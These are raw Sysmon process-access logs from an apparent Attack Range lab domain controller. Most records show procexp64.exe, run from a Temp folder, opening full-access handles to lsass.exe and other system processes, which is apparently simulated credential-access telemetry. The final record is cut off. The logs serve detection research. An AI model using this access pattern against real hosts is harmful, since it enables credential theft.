10341000x8000000000000000791197Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791196Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791195Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791194Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791193Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791192Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791191Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791190Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791189Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791188Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791187Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791186Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.126{732C744F-1593-600B-AC00-00000000A301}46563536C:\Windows\system32\conhost.exe{732C744F-3264-6010-DBA2-00000000A301}6764C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791185Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.126{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791184Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.126{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791183Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.126{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791182Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.126{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791181Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.126{732C744F-1517-600B-0500-00000000A301}640756C:\Windows\system32\csrss.exe{732C744F-3264-6010-DBA2-00000000A301}6764C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000791180Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.126{732C744F-1593-600B-A800-00000000A301}26163156C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{732C744F-3264-6010-DBA2-00000000A301}6764C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000791179Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.127{732C744F-3264-6010-DBA2-00000000A301}6764C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{732C744F-1518-600B-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000791329Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D4A2-00000000A301}4024C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791328Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791327Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791326Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791325Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791324Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791323Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791322Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791321Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791320Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791319Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791318Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791317Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791316Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791315Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791314Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 